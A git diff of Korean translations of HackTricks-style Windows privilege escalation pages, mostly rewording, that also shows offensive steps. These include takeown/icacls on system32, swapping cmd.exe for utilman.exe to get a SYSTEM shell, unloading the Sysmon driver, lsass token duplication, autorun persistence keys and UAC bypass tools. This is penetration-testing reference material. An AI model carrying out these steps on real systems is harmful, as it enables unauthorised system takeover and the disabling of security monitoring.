-| **`SeTakeOwnership`**      | _**관리자**_ | _**내장 명령**_        | <p>1. <code>takeown.exe /f "%windir%\system32"</code><br>2. <code>icalcs.exe "%windir%\system32" /grant "%username%":F</code><br>3. cmd.exe를 utilman.exe로 이름 변경<br>4. 콘솔을 잠그고 Win+U를 누릅니다.</p>                                                                                                                                       | <p>일부 AV 소프트웨어에 의해 공격이 감지될 수 있습니다.</p><p>대체 방법은 동일한 권한을 사용하여 "Program Files"에 저장된 서비스 바이너리를 교체하는 것입니다.</p>                                                                                                                                                           |
+| **`SeCreateToken`**        | _**관리자**_ | 3rd party tool          | `NtCreateToken`으로 로컬 관리자 권한을 포함한 임의의 토큰 생성.                                                                                                                                                                                                                                                                          |                                                                                                                                                                                                                                                                                                                                |
+| **`SeDebug`**              | _**관리자**_ | **PowerShell**          | `lsass.exe` 토큰 복제.                                                                                                                                                                                                                                                                                                                   | [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1)에서 스크립트를 찾을 수 있습니다.                                                                                                                                                                                                         |
+| **`SeLoadDriver`**         | _**관리자**_ | 3rd party tool          | <p>1. <code>szkg64.sys</code>와 같은 결함이 있는 커널 드라이버 로드<br>2. 드라이버 취약점 악용<br><br>또는 이 권한을 사용하여 <code>ftlMC</code> 내장 명령으로 보안 관련 드라이버를 언로드할 수 있습니다. 즉: <code>fltMC sysmondrv</code></p>                                                                           | <p>1. <code>szkg64</code> 취약점은 <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732">CVE-2018-15732</a>로 나열되어 있습니다.<br>2. <code>szkg64</code> <a href="https://www.greyhathacker.net/?p=1025">악용 코드</a>는 <a href="https://twitter.com/parvezghh">Parvez Anwar</a>에 의해 작성되었습니다.</p> |
+| **`SeRestore`**            | _**관리자**_ | **PowerShell**          | <p>1. SeRestore 권한이 있는 상태에서 PowerShell/ISE 실행.<br>2. <a href="https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1">Enable-SeRestorePrivilege</a>로 권한 활성화.<br>3. utilman.exe를 utilman.old로 이름 변경<br>4. cmd.exe를 utilman.exe로 이름 변경<br>5. 콘솔 잠그고 Win+U 누르기</p> | <p>일부 AV 소프트웨어에 의해 공격이 감지될 수 있습니다.</p><p>대체 방법은 동일한 권한을 사용하여 "Program Files"에 저장된 서비스 바이너리를 교체하는 것입니다.</p>                                                                                                                                                            |
+| **`SeTakeOwnership`**      | _**관리자**_ | _**내장 명령**_        | <p>1. <code>takeown.exe /f "%windir%\system32"</code><br>2. <code>icalcs.exe "%windir%\system32" /grant "%username%":F</code><br>3. cmd.exe를 utilman.exe로 이름 변경<br>4. 콘솔 잠그고 Win+U 누르기</p>                                                                                                                                       | <p>일부 AV 소프트웨어에 의해 공격이 감지될 수 있습니다.</p><p>대체 방법은 동일한 권한을 사용하여 "Program Files"에 저장된 서비스 바이너리를 교체하는 것입니다.</p>                                                                                                                                                           |
 | **`SeTcb`**                | _**관리자**_ | 3rd party tool          | <p>토큰을 조작하여 로컬 관리자 권한을 포함하도록 합니다. SeImpersonate가 필요할 수 있습니다.</p><p>확인 필요.</p>                                                                                                                                                                                                                                     |                                                                                                                                                                                                                                                                                                                                |
 
 ## 참고
diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
index 8db983069..d9c2b968d 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
@@ -11,7 +11,7 @@ Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
 ```
 ## Scheduled Tasks
 
-**작업**은 **특정 빈도**로 실행되도록 예약할 수 있습니다. 실행되도록 예약된 이진 파일을 확인하려면:
+**작업**은 **특정 빈도**로 실행되도록 예약할 수 있습니다. 실행되도록 예약된 바이너리를 보려면:
 ```bash
 schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab"
 schtasks /query /fo LIST 2>nul | findstr TaskName
@@ -36,7 +36,7 @@ Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
 ## 레지스트리
 
 > [!NOTE]
-> [여기에서의 노트](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): **Wow6432Node** 레지스트리 항목은 64비트 Windows 버전을 실행하고 있음을 나타냅니다. 운영 체제는 이 키를 사용하여 64비트 Windows 버전에서 실행되는 32비트 응용 프로그램에 대한 HKEY_LOCAL_MACHINE\SOFTWARE의 별도 보기를 표시합니다.
+> [여기에서 노트](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): **Wow6432Node** 레지스트리 항목은 64비트 Windows 버전을 실행하고 있음을 나타냅니다. 운영 체제는 이 키를 사용하여 64비트 Windows 버전에서 실행되는 32비트 응용 프로그램에 대한 HKEY_LOCAL_MACHINE\SOFTWARE의 별도 보기를 표시합니다.
 
 ### 실행
 
@@ -162,7 +162,7 @@ Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
 
 `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`
 
-일반적으로 **Userinit** 키는 **userinit.exe**로 설정됩니다. 그러나 이 키가 수정되면, 지정된 실행 파일이 사용자 로그온 시 **Winlogon**에 의해 실행됩니다. 유사하게, **Shell** 키는 Windows의 기본 셸인 **explorer.exe**를 가리키도록 설정되어 있습니다.
+일반적으로 **Userinit** 키는 **userinit.exe**로 설정됩니다. 그러나 이 키가 수정되면, 지정된 실행 파일이 사용자 로그온 시 **Winlogon**에 의해 실행됩니다. 유사하게, **Shell** 키는 Windows의 기본 셸인 **explorer.exe**를 가리키도록 되어 있습니다.
 ```bash
 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit"
 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell"
@@ -170,14 +170,14 @@ Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVers
 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Shell"
 ```
 > [!NOTE]
-> 레지스트리 값을 덮어쓰거나 이진 파일을 덮어쓸 수 있다면 권한을 상승시킬 수 있습니다.
+> 레지스트리 값을 덮어쓰거나 바이너리를 덮어쓸 수 있다면 권한을 상승시킬 수 있습니다.
 
 ### 정책 설정
 
 - `HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer`
 - `HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer`
 
-**실행** 키를 확인하십시오.
+**실행** 키를 확인하세요.
 ```bash
 reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
 reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
@@ -227,8 +227,8 @@ Active Setup은 다음 레지스트리 키를 통해 관리됩니다:
 
 **보안 통찰력:**
 
-- **`IsInstalled`**가 `"1"`로 설정된 키를 수정하거나 특정 **`StubPath`**에 쓰는 것은 권한 상승을 위한 무단 명령 실행으로 이어질 수 있습니다.
-- 충분한 권한이 주어질 경우, 어떤 **`StubPath`** 값에서 참조된 이진 파일을 변경하는 것도 권한 상승을 달성할 수 있습니다.
+- **`IsInstalled`**가 `"1"`로 설정된 키를 특정 **`StubPath`**로 수정하거나 작성하면 무단 명령 실행으로 이어질 수 있으며, 이는 권한 상승을 초래할 수 있습니다.
+- 어떤 **`StubPath`** 값에서 참조된 이진 파일을 변경하는 것도 충분한 권한이 있을 경우 권한 상승을 달성할 수 있습니다.
 
 Active Setup 구성 요소 전반에 걸쳐 **`StubPath`** 구성을 검사하기 위해 다음 명령을 사용할 수 있습니다:
 ```bash
@@ -291,15 +291,15 @@ HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Executi
 ```
 ## SysInternals
 
-모든 autoruns를 찾을 수 있는 사이트는 **이미**[ **winpeas.exe**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe)로 검색되었습니다. 그러나 **자동 실행되는** 파일의 **더 포괄적인 목록**을 원한다면 Sysinternals의 [autoruns](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)를 사용할 수 있습니다:
+autoruns를 찾을 수 있는 모든 사이트는 **이미** [**winpeas.exe**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe)로 검색되었습니다. 그러나 **자동 실행되는** 파일의 **더 포괄적인 목록**을 원한다면 Sysinternals의 [autoruns](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)를 사용할 수 있습니다:
 ```
 autorunsc.exe -m -nobanner -a * -ct /accepteula
 ```
-## 더 많은 정보
+## More
 
 **레지스트리와 같은 Autoruns를 더 찾으려면** [**https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2**](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2)
 
-## 참고 문헌
+## References
 
 - [https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref](https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref)
 - [https://attack.mitre.org/techniques/T1547/001/](https://attack.mitre.org/techniques/T1547/001/)
diff --git a/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
index 660514583..6080ee275 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
@@ -2,7 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-> [!WARNING] > **JuicyPotato는** Windows Server 2019 및 Windows 10 빌드 1809 이상에서 작동하지 않습니다. 그러나, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)**를 사용하여 **동일한 권한을 활용하고 `NT AUTHORITY\SYSTEM`\*\* 수준의 접근을 얻을 수 있습니다. 이 [블로그 게시물](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)은 JuicyPotato가 더 이상 작동하지 않는 Windows 10 및 Server 2019 호스트에서 임시 권한을 남용하는 데 사용할 수 있는 `PrintSpoofer` 도구에 대해 심층적으로 설명합니다.
+> [!WARNING] > **JuicyPotato는** Windows Server 2019 및 Windows 10 빌드 1809 이상에서 작동하지 않습니다. 그러나, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)**는 동일한 권한을 활용하고 `NT AUTHORITY\SYSTEM`\*\* 수준의 접근을 얻는 데 사용할 수 있습니다. 이 [블로그 게시물](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)은 JuicyPotato가 더 이상 작동하지 않는 Windows 10 및 Server 2019 호스트에서 임시 권한을 남용하는 데 사용할 수 있는 `PrintSpoofer` 도구에 대해 자세히 설명합니다.
 
 ## Quick Demo
 
diff --git a/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md b/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
index 718f85888..39f174c85 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
@@ -153,7 +153,7 @@ return 0;
 [-] CreateProcessWithTokenW Return Code: 0
 [-] CreateProcessWithTokenW Error: 1326
 ```
-이것은 당신이 High Integrity 수준에서 실행 중이더라도 **충분한 권한이 없다는 것을 의미합니다**.\
+이것은 높은 무결성 수준에서 실행 중이더라도 **충분한 권한이 없다는** 것을 의미합니다.\
 현재 `svchost.exe` 프로세스에 대한 관리자 권한을 **processes explorer** (또는 process hacker를 사용할 수도 있음)로 확인해 보겠습니다:
 
 1. `svchost.exe` 프로세스를 선택합니다.
@@ -165,12 +165,12 @@ return 0;
 
 ![](<../../images/image (437).png>)
 
-이전 이미지는 선택된 프로세스에 대해 "Administrators"가 가진 모든 권한을 포함하고 있습니다 (예를 들어 `svchost.exe`의 경우 그들은 "Query" 권한만 가지고 있습니다).
+이전 이미지는 선택된 프로세스에 대해 "Administrators"가 가진 모든 권한을 포함하고 있습니다 (예를 들어 `svchost.exe`의 경우 "Query" 권한만 가지고 있음을 볼 수 있습니다).
 
-`winlogon.exe`에 대해 "Administrators"가 가진 권한을 확인해 보세요:
+`winlogon.exe`에 대한 "Administrators"의 권한을 확인해 보세요:
 
 ![](<../../images/image (1102).png>)
 
-해당 프로세스 내에서 "Administrators"는 "메모리 읽기" 및 "권한 읽기"를 할 수 있으며, 이는 아마도 Administrators가 이 프로세스에서 사용되는 토큰을 가장할 수 있게 해줍니다.
+해당 프로세스 내에서 "Administrators"는 "메모리 읽기" 및 "권한 읽기"를 할 수 있으며, 이는 아마도 관리자가 이 프로세스에서 사용되는 토큰을 가장할 수 있게 해줍니다.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/windows-security-controls/uac-user-account-control.md b/src/windows-hardening/windows-security-controls/uac-user-account-control.md
index c12028070..ab5dbf9b1 100644
--- a/src/windows-hardening/windows-security-controls/uac-user-account-control.md
+++ b/src/windows-hardening/windows-security-controls/uac-user-account-control.md
@@ -4,7 +4,7 @@
 
 ## UAC
 
-[사용자 계정 컨트롤 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)는 **승격된 활동에 대한 동의 프롬프트**를 활성화하는 기능입니다. 애플리케이션은 서로 다른 `무결성` 수준을 가지며, **높은 수준**의 프로그램은 **시스템을 잠재적으로 손상시킬 수 있는 작업**을 수행할 수 있습니다. UAC가 활성화되면 애플리케이션과 작업은 항상 **비관리자 계정의 보안 컨텍스트에서 실행**되며, 관리자가 명시적으로 이러한 애플리케이션/작업이 시스템에 대한 관리자 수준의 액세스를 갖도록 허가하지 않는 한 그렇습니다. 이는 관리자가 의도하지 않은 변경으로부터 보호하는 편의 기능이지만 보안 경계로 간주되지는 않습니다.
+[사용자 계정 컨트롤 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)는 **승격된 활동에 대한 동의 프롬프트**를 활성화하는 기능입니다. 애플리케이션은 서로 다른 `무결성` 수준을 가지며, **높은 수준**의 프로그램은 **시스템을 잠재적으로 손상시킬 수 있는 작업**을 수행할 수 있습니다. UAC가 활성화되면 애플리케이션과 작업은 항상 **비관리자 계정의 보안 컨텍스트에서 실행**되며, 관리자가 명시적으로 이러한 애플리케이션/작업에 시스템에 대한 관리자 수준의 액세스를 부여하지 않는 한 그렇습니다. 이는 관리자가 의도하지 않은 변경으로부터 보호하는 편의 기능이지만 보안 경계로 간주되지는 않습니다.
 
 무결성 수준에 대한 자세한 정보는 다음을 참조하십시오:
 
@@ -12,15 +12,15 @@
 ../windows-local-privilege-escalation/integrity-levels.md
 {{#endref}}
 
-UAC가 설정되면 관리자 사용자에게 2개의 토큰이 부여됩니다: 일반 사용자 키, 일반 수준에서 정기적인 작업을 수행하기 위한 것과 관리자 권한이 있는 하나입니다.
+UAC가 설정되면 관리자 사용자에게 2개의 토큰이 제공됩니다: 일반 사용자 키, 일반 수준에서 정기적인 작업을 수행하기 위한 것과 관리자 권한이 있는 하나입니다.
 
-이 [페이지](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)는 UAC가 어떻게 작동하는지에 대해 깊이 논의하며, 로그인 프로세스, 사용자 경험 및 UAC 아키텍처를 포함합니다. 관리자는 보안 정책을 사용하여 UAC가 조직의 특정 요구에 맞게 작동하도록 구성할 수 있으며, 로컬 수준에서 (secpol.msc 사용) 또는 Active Directory 도메인 환경에서 그룹 정책 개체(GPO)를 통해 구성하고 배포할 수 있습니다. 다양한 설정에 대한 자세한 내용은 [여기](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings)에서 논의됩니다. UAC에 대해 설정할 수 있는 그룹 정책 설정은 10개가 있습니다. 다음 표는 추가 세부 정보를 제공합니다:
+이 [페이지](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)에서는 UAC의 작동 방식에 대해 깊이 논의하며, 로그인 프로세스, 사용자 경험 및 UAC 아키텍처를 포함합니다. 관리자는 보안 정책을 사용하여 UAC가 조직의 특정 요구에 맞게 작동하도록 구성할 수 있으며, 로컬 수준에서 (secpol.msc 사용) 또는 Active Directory 도메인 환경에서 그룹 정책 개체(GPO)를 통해 구성하고 배포할 수 있습니다. 다양한 설정에 대한 자세한 내용은 [여기](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings)에서 논의됩니다. UAC에 대해 설정할 수 있는 그룹 정책 설정은 10개가 있습니다. 다음 표는 추가 세부 정보를 제공합니다:
 
 | 그룹 정책 설정                                                                                                                                                                                                                                                                                                                                                           | 레지스트리 키                | 기본 설정                                              |
 | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------- | ------------------------------------------------------------ |
 | [사용자 계정 컨트롤: 내장 관리자 계정에 대한 관리자 승인 모드](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account)                                                     | FilterAdministratorToken    | 비활성화                                                     |
 | [사용자 계정 컨트롤: UIAccess 애플리케이션이 보안 데스크탑을 사용하지 않고 승격을 요청할 수 있도록 허용](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle      | 비활성화                                                     |
-| [사용자 계정 컨트롤: 관리자에 대한 승격 프롬프트의 동작 (관리자 승인 모드)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode)                     | ConsentPromptBehaviorAdmin  | 비Windows 바이너리에 대한 동의 요청                  |
+| [사용자 계정 컨트롤: 관리자에 대한 승격 프롬프트의 동작 (관리자 승인 모드)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode)                     | ConsentPromptBehaviorAdmin  | 비Windows 이진 파일에 대한 동의 요청                  |
 | [사용자 계정 컨트롤: 표준 사용자에 대한 승격 프롬프트의 동작](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users)                                                                   | ConsentPromptBehaviorUser   | 보안 데스크탑에서 자격 증명 요청                 |
 | [사용자 계정 컨트롤: 애플리케이션 설치 감지 및 승격 요청](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation)                                                       | EnableInstallerDetection    | 활성화 (홈 기본값) 비활성화 (기업 기본값) |
 | [사용자 계정 컨트롤: 서명되고 검증된 실행 파일만 승격](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated)                                                             | ValidateAdminCodeSignatures | 비활성화                                                     |
@@ -31,11 +31,11 @@ UAC가 설정되면 관리자 사용자에게 2개의 토큰이 부여됩니다:
 
 ### UAC 우회 이론
 
-일부 프로그램은 **사용자가** **관리자 그룹에 속하는 경우** **자동으로 승격**됩니다. 이러한 바이너리는 _**Manifests**_ 내부에 _**autoElevate**_ 옵션이 _**True**_ 값으로 설정되어 있습니다. 바이너리는 또한 **Microsoft에 의해 서명**되어야 합니다.
+일부 프로그램은 **사용자가** **관리자 그룹에 속하는 경우** **자동으로 승격**됩니다. 이러한 이진 파일은 _**Manifests**_ 내부에 _**autoElevate**_ 옵션을 _**True**_ 값으로 가지고 있습니다. 이 이진 파일은 **Microsoft에 의해 서명**되어야 합니다.
 
-그런 다음, **UAC**를 **우회**하기 위해 ( **중간** 무결성 수준에서 **높은** 수준으로 승격) 일부 공격자는 이러한 종류의 바이너리를 사용하여 **임의 코드를 실행**합니다. 이는 **높은 무결성 프로세스**에서 실행되기 때문입니다.
+그런 다음 **UAC**를 **우회**하기 위해 ( **중간** 무결성 수준에서 **높은** 수준으로 승격) 일부 공격자는 이러한 종류의 이진 파일을 사용하여 **임의 코드를 실행**합니다. 이는 **높은 무결성 프로세스**에서 실행되기 때문입니다.
 
-바이너리의 _**Manifest**_를 확인하려면 Sysinternals의 _**sigcheck.exe**_ 도구를 사용할 수 있습니다. 그리고 _Process Explorer_ 또는 _Process Monitor_ (Sysinternals)의 사용하여 프로세스의 **무결성 수준**을 **확인**할 수 있습니다.
+이진 파일의 _**Manifest**_를 확인하려면 Sysinternals의 _**sigcheck.exe**_ 도구를 사용할 수 있습니다. 그리고 _Process Explorer_ 또는 _Process Monitor_ (Sysinternals)의 사용하여 프로세스의 **무결성 수준**을 **확인**할 수 있습니다.
 
 ### UAC 확인
 
@@ -46,7 +46,7 @@ REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
 EnableLUA    REG_DWORD    0x1
 ```
-만약 **`1`** 이면 UAC가 **활성화**된 것이고, **`0`** 이거나 **존재하지 않으면**, UAC는 **비활성화**된 것입니다.
+만약 **`1`** 이면 UAC가 **활성화**된 것이고, **`0`** 이거나 **존재하지 않으면** UAC가 **비활성화**된 것입니다.
 
 그 다음, **어떤 수준**이 구성되어 있는지 확인하십시오:
 ```
@@ -55,29 +55,29 @@ REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
 ConsentPromptBehaviorAdmin    REG_DWORD    0x5
 ```
-- **`0`**이면 UAC가 프롬프트를 표시하지 않습니다 (예: **비활성화**됨)
-- **`1`**이면 관리자가 **사용자 이름과 비밀번호**를 요청받아야 하며, 높은 권한으로 바이너리를 실행할 수 있습니다 (보안 데스크탑에서)
-- **`2`** (**항상 나에게 알림**) UAC는 관리자가 높은 권한으로 무언가를 실행하려고 할 때 항상 확인을 요청합니다 (보안 데스크탑에서)
-- **`3`**은 `1`과 같지만 보안 데스크탑에서 필요하지 않습니다
-- **`4`**는 `2`와 같지만 보안 데스크탑에서 필요하지 않습니다
-- **`5`**(**기본값**)는 관리자가 높은 권한으로 비 Windows 바이너리를 실행하기 위해 확인을 요청합니다
+- **`0`**이면, UAC가 프롬프트하지 않음 (예: **비활성화**)
+- **`1`**이면, 관리자에게 **사용자 이름과 비밀번호**를 요청하여 이진 파일을 높은 권한으로 실행함 (보안 데스크탑에서)
+- **`2`** (**항상 나에게 알림**) UAC는 관리자가 높은 권한으로 무언가를 실행하려고 할 때 항상 확인을 요청함 (보안 데스크탑에서)
+- **`3`**은 `1`과 같지만 보안 데스크탑에서 필요하지 않음
+- **`4`**는 `2`와 같지만 보안 데스크탑에서 필요하지 않음
+- **`5`**(**기본값**)는 관리자가 높은 권한으로 비 Windows 이진 파일을 실행하도록 확인을 요청함
 
-그런 다음 **`LocalAccountTokenFilterPolicy`**의 값을 확인해야 합니다\
-값이 **`0`**이면, **RID 500** 사용자 (**내장 관리자**)만 **UAC 없이 관리 작업을 수행할 수** 있으며, `1`이면 **"Administrators"** 그룹 내의 모든 계정이 이를 수행할 수 있습니다.
+그런 다음 **`LocalAccountTokenFilterPolicy`**의 값을 확인해야 함\
+값이 **`0`**이면, **RID 500** 사용자 (**내장 관리자**)만 **UAC 없이 관리 작업**을 수행할 수 있으며, `1`이면 **"Administrators"** 그룹 내의 **모든 계정**이 이를 수행할 수 있음.
 
-마지막으로 **`FilterAdministratorToken`** 키의 값을 확인해야 합니다\
-**`0`**(기본값)이면 **내장 관리자 계정이** 원격 관리 작업을 수행할 수 있으며, **`1`**이면 내장 관리자 계정은 `LocalAccountTokenFilterPolicy`가 `1`로 설정되지 않는 한 원격 관리 작업을 수행할 수 없습니다.
+마지막으로 **`FilterAdministratorToken`** 키의 값을 확인해야 함\
+**`0`**(기본값)이면, **내장 관리자 계정이** 원격 관리 작업을 수행할 수 있으며, **`1`**이면 내장 관리자 계정은 `LocalAccountTokenFilterPolicy`가 `1`로 설정되지 않는 한 원격 관리 작업을 수행할 수 없음.
 
 #### 요약
 
-- `EnableLUA=0` 또는 **존재하지 않으면**, **누구에게도 UAC 없음**
-- `EnableLua=1`이고 **`LocalAccountTokenFilterPolicy=1`이면, 누구에게도 UAC 없음**
-- `EnableLua=1`이고 **`LocalAccountTokenFilterPolicy=0` 및 `FilterAdministratorToken=0`이면, RID 500 (내장 관리자)에게 UAC 없음**
-- `EnableLua=1`이고 **`LocalAccountTokenFilterPolicy=0` 및 `FilterAdministratorToken=1`이면, 모든 사용자에게 UAC 있음**
+- `EnableLUA=0` 또는 **존재하지 않음**이면, **누구에게도 UAC 없음**
+- `EnableLua=1`이고 **`LocalAccountTokenFilterPolicy=1`**이면, 누구에게도 UAC 없음
+- `EnableLua=1`이고 **`LocalAccountTokenFilterPolicy=0`** 및 **`FilterAdministratorToken=0`**이면, RID 500 (내장 관리자)에게 UAC 없음
+- `EnableLua=1`이고 **`LocalAccountTokenFilterPolicy=0`** 및 **`FilterAdministratorToken=1`**이면, 모두에게 UAC 있음
 
-이 모든 정보는 **metasploit** 모듈: `post/windows/gather/win_privs`를 사용하여 수집할 수 있습니다.
+이 모든 정보는 **metasploit** 모듈: `post/windows/gather/win_privs`를 사용하여 수집할 수 있음
 
-사용자의 그룹을 확인하고 무결성 수준을 얻을 수도 있습니다:
+사용자의 그룹을 확인하고 무결성 수준을 얻을 수도 있음:
 ```
 net user %username%
 whoami /groups | findstr Level
@@ -154,37 +154,37 @@ Major  Minor  Build  Revision
 
 #### 더 많은 UAC 우회
 
-**여기에서 AUC를 우회하는 데 사용되는 모든** 기술은 **피해자와의 완전한 대화형 셸**을 **필요로 합니다** (일반적인 nc.exe 셸은 충분하지 않습니다).
+**여기에서 AUC를 우회하는 데 사용되는 모든** 기술은 **피해자와의 완전한 대화형 셸**을 **요구**합니다(일반 nc.exe 셸은 충분하지 않습니다).
 
-**meterpreter** 세션을 사용하여 얻을 수 있습니다. **세션** 값이 **1**인 **프로세스**로 마이그레이션하십시오:
+**meterpreter** 세션을 사용하여 얻을 수 있습니다. **Session** 값이 **1**인 **프로세스**로 마이그레이션하십시오:
 
 ![](<../../images/image (96).png>)
 
-(_explorer.exe_는 작동해야 합니다)
+(_explorer.exe_가 작동해야 합니다)
 
 ### GUI를 통한 UAC 우회
 
 **GUI에 접근할 수 있다면 UAC 프롬프트가 나타날 때 그냥 수락하면 됩니다**, 실제로 우회할 필요는 없습니다. 따라서 GUI에 접근하면 UAC를 우회할 수 있습니다.
 
-게다가, 누군가가 사용 중인 GUI 세션을 얻으면 (잠재적으로 RDP를 통해) **관리자로 실행되는 몇 가지 도구가 있을 수 있습니다**. 여기서 **cmd**를 예를 들어 **관리자**로 직접 실행할 수 있습니다. UAC에 의해 다시 프롬프트되지 않습니다. [**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif)와 같은 도구가 있습니다. 이는 좀 더 **은밀할 수 있습니다**.
+게다가, 누군가가 사용 중인 GUI 세션(잠재적으로 RDP를 통해)에 접근하면 **관리자로 실행되는 몇 가지 도구**가 있어 **cmd**를 예를 들어 **관리자 권한으로** 직접 실행할 수 있습니다. UAC에 의해 다시 프롬프트되지 않습니다. [**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif). 이는 좀 더 **은밀할 수 있습니다**.
 
 ### 시끄러운 무차별 대입 UAC 우회
 
-시끄러운 것이 신경 쓰이지 않는다면 항상 [**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin)과 같은 것을 **실행할 수 있습니다**. 이는 **사용자가 수락할 때까지 권한 상승을 요청합니다**.
+시끄러운 것이 신경 쓰이지 않는다면 항상 **다음과 같은 것을 실행할 수 있습니다**: [**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin) 이 **사용자가 수락할 때까지 권한 상승을 요청합니다**.
 
 ### 나만의 우회 - 기본 UAC 우회 방법론
 
